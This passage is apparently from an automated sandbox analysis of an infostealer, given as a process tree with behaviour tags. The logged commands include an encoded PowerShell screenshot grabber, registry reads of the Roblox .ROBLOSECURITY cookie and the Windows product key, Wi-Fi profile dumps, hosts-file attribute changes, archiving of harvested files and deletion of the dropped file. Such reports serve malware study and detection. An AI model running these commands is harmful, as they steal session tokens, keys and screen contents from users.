    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3860
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2248
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3220
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:3560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3168
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mhrnpza0\mhrnpza0.cmdline"
        5⤵
        
        PID:3100
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1D9.tmp" "c:\Users\Admin\AppData\Local\Temp\mhrnpza0\CSC7FECCFD210C2484CAC60A0B4585D99B7.TMP"
        6⤵
        
        PID:2744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5092
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4288
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4784
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:5084
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2088
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1488
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2640
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3608
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1012
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:5048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35682\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\tuRJY.zip" *"
    3⤵
    PID:2776
  - - C:\Users\Admin\AppData\Local\Temp\_MEI35682\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI35682\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\tuRJY.zip" *
      4⤵
      Executes dropped EXE
      PID:2684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4836
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4860
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2720
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4604
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4028
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3520
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\‏ ‎ .scr""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1648
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4364

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2024

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:452

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe a5a1c8c537058ab81af0c907df43449d goJbPPeYjkCt51LbKO2onA.0.1.0.0.0
1⤵
PID:3672

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2840

C:\Users\Admin\AppData\Local\Temp\bound.exe
"C:\Users\Admin\AppData\Local\Temp\bound.exe"
1⤵
- Executes dropped EXE
PID:1588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe0384cc40,0x7ffe0384cc4c,0x7ffe0384cc58
  2⤵
  PID:5084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:2
  2⤵
  PID:2460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2064,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2124 /prefetch:3
  2⤵
  PID:60
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2284,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2532 /prefetch:8
  2⤵
  PID:4468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3200 /prefetch:1
  2⤵
  PID:4628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3244,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:5076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3748,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3728 /prefetch:1
  2⤵
  PID:1648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4844,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4868 /prefetch:8
  2⤵
  PID:4184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4748,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4696 /prefetch:8
  2⤵
  PID:2432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5152,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4868 /prefetch:8
  2⤵
  PID:64
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5084 /prefetch:8
  2⤵
  PID:3132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5208,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4736 /prefetch:8
  2⤵
  PID:1968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5028,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5064 /prefetch:8
  2⤵
  PID:4632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5048,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5292 /prefetch:2
  2⤵
  PID:2200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5540,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5508 /prefetch:1
  2⤵
  PID:2188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4780,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5472 /prefetch:1
  2⤵
  PID:4336
- C:\Program Files\Google\Chrome\Application\chrome.exe
